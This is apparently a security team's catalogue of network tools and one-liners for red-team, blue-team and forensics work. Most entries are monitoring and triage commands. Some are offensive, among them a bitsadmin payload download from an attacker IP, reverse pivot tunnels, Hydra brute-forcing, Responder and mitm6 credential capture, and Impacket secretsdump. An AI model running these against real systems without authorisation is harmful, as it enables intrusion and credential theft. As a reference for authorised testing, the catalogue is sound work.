[THUGS(red)]

Tools

Everything the team reaches for — CTF, red team, blue team, OSINT, forensics, wireless and living-off-the-land, plus the one-liners we retype every engagement. Search, filter by tag, and click any code block to copy it.

1054
entries
37
tags in use
2h ago
last added
clear
tools.db 119 shown

Angry IP Scanner tool

Enumeration Network

Simple, fast cross-platform IP address and port scanner with a GUI — a quick way to inventory what is alive on a subnet without learning nmap syntax.

visit → added by THUGS(red)

Argus tool Linux

Blue Team Network

The Audit Record Generation and Utilization System — a network flow monitor that turns raw traffic into detailed, auditable flow records, one of the longest-running open network-audit projects still maintained.

argus -i eth0 -w flows.argus
visit → added by THUGS(red)

Arkime tool Linux

Blue Team Defensive Network

Full-packet-capture indexing and search system (formerly Moloch) — captures and stores traffic at scale, then lets analysts search and pull sessions back out by any field, PCAP included.

visit → added by THUGS(red)

Arkime (formerly Moloch) tool Linux

Blue Team Forensics Network

Large-scale, indexed full-packet capture — captures and stores traffic while indexing session metadata for search, so a SOC can pull the exact PCAP for an alert from months of retained traffic instead of scrolling Wireshark.

visit → added by THUGS(red)

arp-scan tool Linux

Enumeration Network

Layer-2 ARP-based host discovery for the local network segment — finds every device on the LAN, including ones that would not respond to an ICMP or TCP scan.

sudo arp-scan --localnet
visit → added by THUGS(red)

ASN and network lookup via Team Cymru whois one-liner

DNS Network Recon

Team Cymru's whois service answers an IP's ASN, prefix, country and registry in a single query, with no API key required.

whois -h whois.cymru.com " -v 1.1.1.1"
visit → added by THUGS(red)

Background download with bitsadmin one-liner Windows

LOLBAS / LOTL Network Red Team

The BITS job service moves a file over HTTP in the background, a built-in transfer path separate from PowerShell logging.

bitsadmin /transfer job /download /priority high http://10.10.14.7/payload.exe C:\Windows\Temp\payload.exe
visit → added by THUGS(red)

Bash one-liner: reverse-resolve a whole subnet fast one-liner Linux

DNS Network Recon

A quick parallel PTR sweep across a /24 without needing a dedicated scanner installed.

for i in $(seq 1 254); do host 10.10.10.$i & done 2>/dev/null | grep -v 'not found'
added by THUGS(red)

Bettercap tool Linux

MITM Network Red Team Wireless / WiFi

A Swiss-army-knife framework for network attacks and monitoring — MITM, WiFi/BLE reconnaissance and attacks, and a scriptable, extensible core.

sudo bettercap -iface eth0
visit → added by THUGS(red)

BGPView tool

Network Recon

Free API and website for ASN, prefix and peering data, a lighter alternative to the Hurricane Electric toolkit for scripted lookups.

curl -s https://api.bgpview.io/ip/1.1.1.1
visit → added by THUGS(red)

boofuzz tool

Binary / RE Fuzzing Network

Protocol-aware fuzzing framework (fork/successor of Sulley) for building fuzzers against network services and file formats with defined message structures.

visit → added by THUGS(red)

Brim / Zui tool

Blue Team Forensics Network

Desktop app for searching and analysing large pcap/Zeek log sets with the Zed query language — much faster iteration than opening a huge capture in a GUI packet viewer.

visit → added by THUGS(red)

CAIDA tool

Network Research

Center for Applied Internet Data Analysis — hosts long-running academic datasets on internet topology, routing and traffic used in network-security research.

visit → added by THUGS(red)

CapTipper tool

Blue Team Malware Network

Explores malicious HTTP traffic captured in a pcap — replays the conversation, reconstructs redirect chains and lets you pull out the delivered payload for analysis.

python captipper.py malicious.pcap
visit → added by THUGS(red)

Check for NFS no_root_squash exports one-liner Linux

Enumeration Network Red Team

An NFS export with no_root_squash lets a remote root user write files as root on the export, including a SUID binary to escalate through locally.

cat /etc/exports 2>/dev/null | grep -v '^#' | grep no_root_squash
added by THUGS(red)

Check the application firewall status one-liner macOS

Blue Team Enumeration Network

Confirms whether the built-in packet filter is even enabled before drawing any conclusion from an absence of blocked-connection logs.

/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
added by THUGS(red)

Chisel tool

Network Red Team

A fast TCP/UDP tunnel over HTTP, written in Go — the go-to tool for pivoting into a network segment you can otherwise only reach through one compromised host.

# attacker: chisel server -p 8000 --reverse\n# target:  ./chisel client 10.10.14.7:8000 R:socks
visit → added by THUGS(red)

CloudShark tool

Blue Team Network

Web-based pcap analysis and sharing platform — upload a capture, get a shareable link with a full protocol decode, annotations and export, for collaborating on a capture without emailing it around.

visit → added by THUGS(red)

Conpot tool Linux

Blue Team Hardware Network

ICS/SCADA honeypot emulating industrial protocols (Modbus, S7comm, etc.) and PLC device fingerprints, to detect and study attacks against industrial control systems.

conpot -t default
visit → added by THUGS(red)

Cowrie tool Linux

Blue Team Defensive Network

A medium-interaction SSH and Telnet honeypot — logs brute-force attempts and full attacker shell sessions, and can fake a filesystem convincingly enough to capture what a bot or human does after it "gets in".

visit → added by THUGS(red)

CrackMapExec (legacy) tool Linux

Network Offensive Red Team

The original Active Directory assessment swiss-army-knife that NetExec forked from — still widely referenced in write-ups and older tooling even though NetExec is the maintained successor.

crackmapexec smb 10.10.10.0/24 -u user -p pass
visit → added by THUGS(red)

Cross-platform: list listening ports and owning process one-liner

Blue Team Forensics Network

The first thing to run on any box during triage — what is listening, and what process owns it. Works the same shape on Linux and Windows.

# Linux
ss -ltnp
# Windows (PowerShell)
Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
added by THUGS(red)

CrowdSec tool

Blue Team Defensive Network

A crowdsourced, behaviour-based intrusion detection and prevention engine — parses local logs for attack patterns and shares/consumes IP reputation with a global community, so one deployment benefits from every other one.

cscli decisions add --ip 1.2.3.4 --duration 24h --reason "manual ban"
visit → added by THUGS(red)

Dionaea tool Linux

Blue Team Malware Network

A honeypot built to be exploited — emulates vulnerable network services (SMB, HTTP, FTP, MSSQL and more) specifically to capture the malware payloads that automated worms and bots drop when they try to exploit it.

visit → added by THUGS(red)

dog tool

DNS Network

Modern command-line DNS client with colourised, readable output and DNS-over-HTTPS/TLS support, a friendlier drop-in for everyday dig usage.

dog example.com MX @1.1.1.1
visit → added by THUGS(red)

doggo tool

DNS Network

Command-line DNS client supporting DoH, DoT and DoQ with human-readable, colourised output — similar niche to dog, written in Go.

doggo example.com @https://1.1.1.1/dns-query
visit → added by THUGS(red)

ElastiFlow tool

Blue Team Network

NetFlow/sFlow/IPFIX analytics built on the Elastic Stack — ships flow data into Elasticsearch with ready-made dashboards for network traffic visibility.

visit → added by THUGS(red)

Ettercap tool Linux

MITM Network Red Team

A long-standing comprehensive suite for man-in-the-middle attacks on a LAN — live connection sniffing, ARP poisoning and content filtering, with both a CLI and a GUI.

ettercap -T -M arp:remote /10.10.10.1// /10.10.10.10//
visit → added by THUGS(red)

Fail2ban tool Linux

Blue Team Defensive Network

The long-standing log-watching intrusion prevention daemon — matches patterns like repeated failed SSH logins in a log file and reacts by firewalling the offending IP, no agent or cloud dependency required.

fail2ban-client status sshd
visit → added by THUGS(red)

FakeNet-NG tool Windows

Blue Team Malware Network

Mandiant's next-gen network simulation tool for dynamic malware analysis — intercepts and fakes DNS/HTTP/HTTPS/SSL traffic on the analysis host itself, no separate VM needed.

fakenet.exe
visit → added by THUGS(red)

Feodo Tracker tool

Blue Team Malware Network

abuse.ch's tracker for Emotet/Dridex/QakBot/TrickBot-family botnet C2 servers — publishes a live blocklist of active C2 IPs.

visit → added by THUGS(red)

fping tool

Enumeration Network

Parallel ping utility — sweeps a whole subnet for live hosts far faster than scripting individual ping calls, a first step in any network inventory.

fping -a -g 10.10.10.0/24 2>/dev/null
visit → added by THUGS(red)

Glutton tool Linux

Blue Team Defensive Network

The Honeynet Project's generic low-interaction honeypot proxy — sits in front of any TCP port, logs every connection and can hand off to protocol-specific honeypots behind it, useful as a catch-all sensor across a whole address range.

visit → added by THUGS(red)

GoAccess tool Linux

Blue Team Forensics Network

Real-time terminal and browser web log analyzer — parses Apache/Nginx access logs on the fly for traffic, status codes and suspicious request patterns during an incident.

goaccess access.log -o report.html --log-format=COMBINED
visit → added by THUGS(red)

GRASSMARLIN tool

Blue Team Hardware Network

NSA-released passive network mapping tool for ICS/SCADA environments — builds a topology map from captured traffic without sending any packets onto often-fragile OT networks.

visit → added by THUGS(red)

Grep auth.log for a brute-force pattern one-liner Linux

Blue Team Forensics Network

Counts failed SSH password attempts per source IP from the system auth log — the fastest confirmation of a brute-force before reaching for fail2ban logs or a SIEM.

grep 'Failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head -20
added by THUGS(red)

GreyNoise tool

Blue Team Network Research

Tracks internet-wide scanning and background noise so a defender can tell "this IP is mass-scanning the whole internet" apart from "this IP is targeting us specifically" — cuts a huge amount of false-positive triage out of alert review.

visit → added by THUGS(red)

Honeyd tool Linux

Blue Team Network

Classic low-interaction honeypot framework that can simulate thousands of virtual hosts with different OS fingerprints on a single machine, to soak up and log network scans.

honeyd -f honeyd.conf
visit → added by THUGS(red)

Honeytrap tool Linux

Blue Team Network

Extensible, event-driven honeypot framework — dynamically spins up service listeners in response to observed connection attempts, geared toward capturing novel attack traffic.

visit → added by THUGS(red)

Hunt Sysmon network connections by process one-liner Windows

Blue Team Defensive Network

Pulls Sysmon Event ID 3 (network connection) entries for a given process image — useful for confirming whether a suspicious binary actually phoned home.

Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' |
  Where-Object { $_.Id -eq 3 -and $_.Message -match 'powershell.exe' } |
  Select-Object TimeCreated, Message
added by THUGS(red)

Hurricane Electric BGP Toolkit tool

DNS Network Recon

Looks up an ASN's announced prefixes, peers and reverse-DNS in-bulk, a go-to reference for understanding whose network address space actually belongs to.

visit → added by THUGS(red)

Hydra tool

Brute Force Network Red Team

A parallelised network login cracker supporting dozens of protocols (SSH, FTP, HTTP forms, RDP, SMB…) — the go-to tool the moment you have a login form and a wordlist.

hydra -l admin -P passwords.txt ssh://10.10.10.10
visit → added by THUGS(red)

I2P tool

Network VPN / Anonymity

Anonymising overlay network built around garlic routing, distinct from Tor in design — used for peer-to-peer anonymous services rather than mainly anonymising exit traffic to the clear web.

visit → added by THUGS(red)

Impacket tool

Network Offensive Red Team

A collection of Python classes for working with network protocols, and the toolset (secretsdump, psexec, GetUserSPNs, smbexec…) built on them — the backbone of most Windows/AD assessment tooling.

impacket-secretsdump DOMAIN/user:[email protected]
visit → added by THUGS(red)

INetSim tool Linux

Blue Team Malware Network

Simulates common internet services (HTTP, DNS, SMTP, FTP…) so malware detonated in an isolated lab thinks it has internet access — captures every request it makes.

inetsim --data-dir /var/lib/inetsim/data
visit → added by THUGS(red)

IntoDNS tool

DNS Network

Checks a domain's DNS and mail-server configuration for common mistakes (missing glue, lame nameservers, SOA issues) and grades the result.

visit → added by THUGS(red)

IVRE tool Linux

Device Search Network Recon

Open-source network recon framework for running your own internet-wide or internal scans and organising the results in a queryable database, essentially a self-hosted Shodan.

visit → added by THUGS(red)

justniffer tool Linux

Blue Team Network

Network protocol analyzer focused on HTTP — logs requests/responses in a customisable format similar to a web server access log, straight off the wire.

justniffer -i eth0 -p "http.request.uri"
visit → added by THUGS(red)

LAN Turtle tool

Hardware Network Red Team

Hak5's covert USB-Ethernet pass-through implant — sits inline on a wired network for remote access, recon and MITM modules while looking like a USB adapter.

visit → added by THUGS(red)

LibreNMS tool

Blue Team Enumeration Network

Auto-discovering network monitoring platform — SNMP-based inventory and alerting across switches, routers, servers and more, a free alternative to commercial NMS suites.

visit → added by THUGS(red)

ligolo-ng tool

Network Red Team

A tunneling/pivoting tool that sets up a real network interface (TUN) on the attacker box, so pivoted traffic looks and behaves like normal routing rather than a SOCKS proxy.

# proxy: ./proxy -selfcert\n# agent: ./agent -connect 10.10.14.7:11601 -ignore-cert
visit → added by THUGS(red)

List established outbound connections one-liner Linux

Blue Team Enumeration Network

Confirms what a process is actually talking to right now, the fastest way to spot a live C2 beacon or an exfil channel.

ss -tnp state established
added by THUGS(red)

List listening sockets and owning process one-liner Linux

Enumeration Network

Shows every listening TCP/UDP socket together with the PID that owns it, the fastest way to see what a box is actually exposing.

ss -tulpn
added by THUGS(red)

List open files and network sockets one-liner macOS

Enumeration Network

lsof is available on macOS just as on Linux, and remains the most direct way to tie a listening or connected socket back to its process.

lsof -i -P | grep -i listen
added by THUGS(red)

Live-tail auth.log for brute-force attempts one-liner Linux

Blue Team Network

Watches SSH failed-password attempts as they happen — the manual, no-Fail2ban-installed version of noticing a brute-force in progress.

tail -f /var/log/auth.log | grep --line-buffered 'Failed password'
added by THUGS(red)

Malcolm tool Linux

Blue Team Forensics Network

CISA's network traffic analysis toolset — packages Zeek, Suricata and Arkime with an OpenSearch/Kibana front end into one Docker-composed stack, for a full-fidelity network monitoring deployment without building it component by component.

visit → added by THUGS(red)

Map listening ports to owning process one-liner Windows

Enumeration Network

The Windows equivalent of ss -tulpn, pairs every listening socket with a PID for quick triage of what a box is actually exposing.

netstat -ano | findstr LISTENING
added by THUGS(red)

Masscan tool Linux

Network Recon

An asynchronous, internet-scale port scanner capable of scanning the entire IPv4 address space in under six minutes — trades nmap's depth for raw speed, then hands results to nmap for the detail pass.

masscan -p1-65535 10.10.10.0/24 --rate 10000
visit → added by THUGS(red)

MassDNS tool Linux

DNS Enumeration Network

A high-performance bulk DNS resolver — designed to resolve millions of domain names against a list of resolvers in a fraction of the time a per-query tool would take, the workhorse underneath most large-scale DNS enumeration tooling.

massdns -r resolvers.txt -t A -o S -w results.txt domains.txt
visit → added by THUGS(red)

mitm6 tool Linux

MITM Network Red Team

Abuses IPv6's default-on status on most Windows networks: answers DHCPv6 requests nobody expected to get answered, then relays the resulting traffic — a very reliable AD compromise path where IPv6 is unmanaged.

sudo mitm6 -d domain.local
visit → added by THUGS(red)

MXToolbox tool

DNS Network

Suite of DNS and mail diagnostic lookups — MX records, DNSBL blacklist status, SPF/DKIM/DMARC validation — in one dashboard.

visit → added by THUGS(red)

naabu tool

Network Recon Red Team

A fast SYN/CONNECT port scanner from ProjectDiscovery, built to slot into a recon pipeline (subfinder -> naabu -> httpx -> nuclei) rather than run standalone.

naabu -host target.tld -top-ports 1000
visit → added by THUGS(red)

Ncat tool

Network

The Nmap Project's modern reimplementation of netcat — TCP/UDP swiss-army-knife with SSL, proxying and connection brokering that classic netcat never had.

ncat -lvnp 4444
visit → added by THUGS(red)

NDSS Symposium Proceedings tool

Network Research

Freely available proceedings of the Network and Distributed System Security Symposium, another top-tier venue alongside USENIX Security, IEEE S&P and CCS.

visit → added by THUGS(red)

Nebula tool

Network VPN / Anonymity

Slack's open-source mesh overlay networking tool combining certificate-based identity with WireGuard-style tunnels — an alternative to Tailscale/ZeroTier for building your own private mesh.

nebula -config config.yml
visit → added by THUGS(red)

Nessus tool

Blue Team Network Whitebox

A widely deployed commercial vulnerability scanner (a free "Essentials" tier exists) — CVE-backed checks across a huge range of software and network devices, with policy-based scanning and reporting.

visit → added by THUGS(red)

Netcat tool

CTF Network

The original "TCP/IP swiss army knife" — reads and writes across network connections from the command line, and the tool almost every reverse shell one-liner assumes is on the box.

nc -lvnp 4444
visit → added by THUGS(red)

Netdisco tool

Blue Team Enumeration Network

Open-source network management and discovery tool — maps switches, routers and connected devices via SNMP/CDP/LLDP for network asset inventory and port-tracing.

visit → added by THUGS(red)

Netdiscover tool Linux

Enumeration Network

An active/passive ARP reconnaissance tool for discovering hosts on a local network without relying on DHCP — useful on networks with no DHCP server or where a full port scan would be noisier than necessary.

netdiscover -r 192.168.1.0/24
visit → added by THUGS(red)

NetExec (formerly CrackMapExec) tool

Enumeration Network Offensive Red Team

The successor to CrackMapExec — a swiss-army-knife for testing large Active Directory networks: credential spraying, command execution, share enumeration, all across a whole subnet at once.

nxc smb 10.10.10.0/24 -u user -p pass --shares
visit → added by THUGS(red)

netsniff-ng tool Linux

Blue Team Network

High-performance Linux network toolkit — zero-copy packet sniffer/analyzer/replay tool built around the kernel ring-buffer for capturing at line rate on busy links.

netsniff-ng --in eth0 --out capture.pcap
visit → added by THUGS(red)

NetworkMiner tool Windows

Blue Team Forensics Network

A passive network forensics tool that reconstructs sessions, files, credentials and host details straight out of a PCAP — built for pulling artifacts out of captured traffic rather than live monitoring.

visit → added by THUGS(red)

Netzob tool

Blue Team Network Research

Protocol reverse-engineering tool — infers the message format and state machine of an unknown or undocumented protocol from captured traffic samples.

visit → added by THUGS(red)

nfdump / NfSen tool Linux

Blue Team Network

NetFlow/IPFIX collection and analysis toolset — nfdump captures and filters flow records from the CLI, NfSen adds a web front-end with graphs and alerting on top.

nfdump -R /flows -o long 'src ip 10.0.0.5'
visit → added by THUGS(red)

ngrep tool Linux

Blue Team Network

grep for network traffic — matches a regex against packet payloads live off an interface or a pcap file, handy for quickly spotting a known string in a stream of packets.

ngrep -q -d eth0 'password' tcp port 80
visit → added by THUGS(red)

Nikto tool

Network Web

An open-source web server scanner that checks for thousands of dangerous files/programs, outdated server software and other misconfigurations — fast and deliberately noisy.

nikto -h https://target.tld
visit → added by THUGS(red)

nmap tool

CTF Network Recon Red Team

Network Mapper — port scanning, service/version detection and scriptable auditing (NSE) for discovery and security assessment.

nmap -sC -sV -T4 -oA initial <ip or host>
visit → added by THUGS(red)

ntopng tool

Blue Team Network

Real-time network traffic monitoring with a web dashboard — flow-level visibility, host and application breakdowns, and historical trending, positioned as a modern, browser-based successor to the original ntop.

ntopng -i eth0
visit → added by THUGS(red)

OpenCanary tool Linux

Blue Team Defensive Network

Thinkst's lightweight, low-interaction honeypot daemon — fakes a handful of common services (SSH, RDP, SMB, HTTP, a fake MySQL) just convincingly enough to alert the moment anything touches them, with almost no operational overhead.

opencanaryd --start
visit → added by THUGS(red)

OpenVAS / Greenbone Vulnerability Management tool Linux

Blue Team Network Whitebox

A full-featured open-source vulnerability scanning and management framework that grew out of the last open Nessus release — a free, self-hosted alternative for network-wide vulnerability assessment.

visit → added by THUGS(red)

OpenVPN tool

Network VPN / Anonymity

Long-standing SSL/TLS-based VPN daemon and protocol — still the default self-hosted option on countless routers/appliances even as WireGuard-based tools take over new deployments.

openvpn --config client.ovpn
visit → added by THUGS(red)

Outline VPN tool

Network VPN / Anonymity

Jigsaw (Google)'s self-hosted Shadowsocks-based VPN server and client apps, packaged to make running your own private VPN endpoint on a VPS straightforward for non-experts.

visit → added by THUGS(red)

p0f tool Linux

Blue Team Enumeration Network

Passive OS and application fingerprinting from raw traffic characteristics (TCP/IP stack quirks) alone — identifies what is talking on the wire without sending a single probe packet.

p0f -i eth0
visit → added by THUGS(red)

PacketTotal tool

Blue Team Network

Free online pcap analysis service — upload a capture and get a Zeek-powered breakdown of connections, files, certificates and suspicious indicators without installing anything.

visit → added by THUGS(red)

Passer tool Linux

Blue Team Enumeration Network

Passive network asset mapping tool — builds an inventory of hosts, services and vulnerabilities purely by watching traffic, no active scanning that could disrupt fragile OT/ICS devices.

passer -i eth0
visit → added by THUGS(red)

PcapXray tool

Blue Team Forensics Network

Generates a visual network diagram from a pcap — hosts, connections, Tor traffic and suspicious flows laid out graphically for a quick "what happened on this network" overview.

python PcapXray.py -f capture.pcap
visit → added by THUGS(red)

Port-forward with netsh portproxy one-liner Windows

Network Red Team

netsh interface portproxy quietly relays a local port to a remote host, a lightweight pivot technique worth using and hunting for alike.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=445 connectaddress=10.10.10.5
added by THUGS(red)

Proxychains-ng tool Linux

Network VPN / Anonymity

Forces an arbitrary dynamically-linked program's TCP connections through a chain of SOCKS/HTTP proxies via LD_PRELOAD — the standard way to route tools that have no built-in proxy support.

proxychains4 curl https://example.com
visit → added by THUGS(red)

Pull every unique IP address out of a PCAP one-liner

Blue Team Forensics Network

Extracts and de-duplicates every source/destination IP seen in a capture with tshark, without loading the whole file into Wireshark.

tshark -r capture.pcap -T fields -e ip.src -e ip.dst | tr '\t' '\n' | sort -u
added by THUGS(red)

Responder tool Linux

MITM Network Offensive Red Team

An LLMNR, NBT-NS and MDNS poisoner that harvests NTLM credential hashes from Windows networks that still fall back to these legacy name-resolution protocols.

sudo responder -I eth0 -wrf
visit → added by THUGS(red)

Reverse-DNS an entire CIDR block one-liner Linux

DNS Network Recon

Walks every address in a range and runs a PTR lookup on each, a fast way to spot hostnames that hint at a network's internal layout.

for ip in $(prips 10.0.0.0/24); do dig +short -x "$ip"; done
added by THUGS(red)

RIPEstat tool

DNS Network Recon

RIPE NCC's tool for exploring routing history, WHOIS and geolocation data for any IP, prefix or ASN, backed by RIPE's own registry and RIS routing data.

visit → added by THUGS(red)

RITA (Real Intelligence Threat Analytics) tool Linux

Blue Team Malware Network

Active Countermeasures' open-source beaconing-detection tool — analyses Zeek logs for the regular-interval connection patterns that C2 beacons produce, surfacing them without needing signatures for the malware itself.

rita import /opt/zeek/logs/current mydataset
visit → added by THUGS(red)

RustScan tool

Network Recon Red Team

An extremely fast port scanner written in Rust that pipes its results straight into nmap for service detection — the "scan the internet in seconds" front end to nmap's slower, thorough back end.

rustscan -a 10.10.10.10 -- -sC -sV
visit → added by THUGS(red)

Sagan tool Linux

Blue Team Defensive Network

A real-time log analysis and correlation engine designed to sit alongside Snort/Suricata, applying Snort-like rule syntax to log data so log events and network alerts can be correlated in one place.

sagan -c /usr/local/etc/sagan.yaml
added by THUGS(red)

Security Onion tool Linux

Blue Team Defensive Network

A free Linux distribution for network security monitoring and log management — bundles Zeek, Suricata, Wazuh and a full Elastic-based analyst UI into one deployable platform for a whole SOC stack.

visit → added by THUGS(red)

Shadowsocks tool

Network VPN / Anonymity

Lightweight encrypted SOCKS5 proxy protocol originally designed to blend in with normal traffic and evade deep packet inspection/censorship, rather than to anonymise like Tor.

ss-local -s server_ip -p 8388 -k password -m aes-256-gcm -l 1080
visit → added by THUGS(red)

SiLK tool Linux

Blue Team Network

CERT/CC's System for Internet-Level Knowledge — a netflow collection and analysis toolkit built for querying flow records at very large (ISP/enterprise-backbone) scale.

rwfilter --start-date=2026/09/03 --proto=6 --pass=stdout | rwstats --fields=dip --top --count=10
visit → added by THUGS(red)

Snort tool Linux

Blue Team Defensive Network

One of the original open-source network intrusion detection/prevention systems — a huge community rule-set ecosystem built up over more than two decades.

snort -A console -q -c /etc/snort/snort.conf -i eth0
visit → added by THUGS(red)

Spot beaconing candidates in a Zeek conn.log one-liner Linux

Blue Team Malware Network

Ranks host pairs by connection count as a quick, RITA-free first pass at spotting regular-interval C2 beaconing in Zeek connection logs.

zcat conn.log.gz | zeek-cut id.orig_h id.resp_h duration | sort | uniq -c | sort -rn | head
added by THUGS(red)

ss — check what is actually listening, without netstat one-liner Linux

CTF Enumeration Network

netstat is deprecated on most modern distros; ss is the built-in replacement for a quick "what is this box listening on" check.

ss -tulnp
added by THUGS(red)

SSLBL tool

Blue Team Malware Network

abuse.ch's SSL Blacklist — JA3/JA3s and certificate SHA1 fingerprints associated with malware C2, useful for detecting malicious TLS traffic without decrypting it.

visit → added by THUGS(red)

Stenographer tool Linux

Blue Team Forensics Network

Google's high-throughput full-packet-capture daemon — buffers traffic to disk on a rolling basis so that when an IDS fires, the packets behind the alert can still be pulled minutes or hours later.

visit → added by THUGS(red)

Suricata tool Linux

Blue Team Defensive Network

A high-performance open-source network IDS/IPS and network security monitoring engine — multi-threaded, Snort-rule-compatible, with built-in protocol logging.

suricata -i eth0 -c /etc/suricata/suricata.yaml
visit → added by THUGS(red)

T-Pot tool Linux

Blue Team Defensive Network

Deutsche Telekom's all-in-one honeypot platform — bundles Cowrie, Dionaea and a couple dozen other honeypots plus an ELK dashboard into one Docker-composed deployment, for a broad-spectrum sensor rather than a single service.

visit → added by THUGS(red)

Tailscale tool

Network VPN / Anonymity

Zero-config mesh VPN built on WireGuard — commonly used in security work to build a private, NAT-traversing network between lab/attack boxes without hand-managing keys or port forwards.

tailscale up --ssh
visit → added by THUGS(red)

tcpdump tool

Forensics Network

The original command-line packet capture/analysis tool, built on libpcap — no GUI, everywhere by default, and still the fastest way to grab a capture on a box with nothing else installed.

tcpdump -i eth0 -w capture.pcap
visit → added by THUGS(red)

tcpflow tool Linux

Blue Team Forensics Network

Captures data transmitted as part of TCP connections and reconstructs each stream into its own file — useful for pulling application-layer content back out of a live capture.

tcpflow -i eth0 -o flows/
visit → added by THUGS(red)

tcpreplay tool Linux

Blue Team Defensive Network

Replays previously captured pcap traffic back onto a live network at controlled speed — used to test IDS/IPS/SIEM detection rules against known-bad traffic without re-attacking anything.

tcpreplay -i eth0 --mbps=10 malicious.pcap
visit → added by THUGS(red)

TCPView tool Windows

Blue Team Forensics Network

Sysinternals GUI showing every active TCP/UDP endpoint with the owning process — a quick live-response check for unexpected outbound connections.

visit → added by THUGS(red)

testssl.sh tool Linux

Cryptography Network Web

Checks a server's TLS/SSL configuration from the command line — supported protocols and ciphers, certificate details, and known vulnerabilities like Heartbleed or POODLE — no browser or Qualys quota needed.

./testssl.sh https://target.tld
visit → added by THUGS(red)

Top talkers in a web access log one-liner Linux

Blue Team Forensics Network

A quick awk pipeline that ranks source IPs by request count, the first thing to run on a log suspected of scanning or brute-force traffic.

awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -20
added by THUGS(red)

WireGuard tool

Network VPN / Anonymity

Modern, minimal-codebase VPN protocol/implementation built into the Linux kernel — the underlying tunnel tech behind most current commercial and self-hosted VPN setups.

wg-quick up wg0
visit → added by THUGS(red)

Wireshark tool

Blue Team CTF Forensics Network

The world's most widely used network protocol analyzer — deep inspection of hundreds of protocols, live capture and offline analysis, with a filter language everyone in the field eventually learns.

wireshark -i eth0 -k
visit → added by THUGS(red)

Xplico tool Linux

Blue Team Forensics Network

Network forensic analysis tool (NFAT) — reconstructs application-layer content (emails, VoIP calls, HTTP content, chat) from a pcap for post-capture investigation.

visit → added by THUGS(red)

YAF (Yet Another Flowmeter) tool Linux

Blue Team Network

CERT NetSA's IPFIX-compliant flow generator — turns raw pcap into flow records with deep packet inspection metadata for downstream SiLK-style analysis.

yaf --in capture.pcap --out flow.yaf --silk
visit → added by THUGS(red)

Zabbix tool

Blue Team Defensive Network

Enterprise-grade open-source monitoring platform — network, server and application monitoring with alerting, widely used as the backbone of an internal visibility/blue-team baseline.

visit → added by THUGS(red)

Zeek (formerly Bro) tool Linux

Blue Team Defensive Network

A network security monitor rather than a signature-matching IDS — transforms traffic into rich, structured logs (connections, DNS, HTTP, files…) that a SOC actually hunts through.

zeek -r capture.pcap
visit → added by THUGS(red)

ZMap tool Linux

Blue Team Network Research

An internet-wide, single-packet network scanner built for research-scale sweeps of the whole IPv4 address space on a single port, rather than deep per-host scanning of a target list.

zmap -p 443 -o results.csv
visit → added by THUGS(red)